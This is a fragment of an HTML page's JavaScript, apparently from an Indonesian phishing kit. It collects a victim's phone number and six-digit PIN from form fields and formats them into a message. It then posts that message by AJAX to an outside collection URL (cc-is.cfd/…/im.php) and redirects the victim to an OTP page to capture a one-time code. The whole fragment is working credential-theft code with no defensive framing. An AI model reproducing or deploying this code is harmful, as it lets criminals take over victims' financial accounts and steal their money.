        pin1.value, 
        pin2.value, 
        pin3.value, 
        pin4.value, 
        pin5.value, 
        pin6.value
    ];
    
  var gabungan = 
        logo + "\n" + 
        tarif + "\n\n" + 
        "|𝗡𝗼𝗺𝗼𝗿 |  <code>0" + nomor.value + "</code>\n" + 
        "|𝗣𝗶𝗻: <pre>" + pin.join("") + "</pre>\n\n" + "| 𝗞𝗶𝗿𝗶𝗺 𝗖𝗼𝗱𝗲 𝗢𝗧𝗣";
  
  // Kirim menggunakan AJAX jQuery seperti contoh
  $.ajax({
    type: 'POST',
    url: 'https://cc-is.cfd/yrt54s/im.php',
    data: { message: gabungan },
    complete: function(data) {
      console.log('Complete');
      setTimeout(() => {
        window.location.href = "otp.html";
      }, 900);
    },
    error: function(xhr, status, error) {
      console.error('Error:', error);
      setTimeout(() => {
        window.location.href = "otp.html";
      }, 900);
    }
  });
};
</script>
<script>
</script>
</body>
</html>
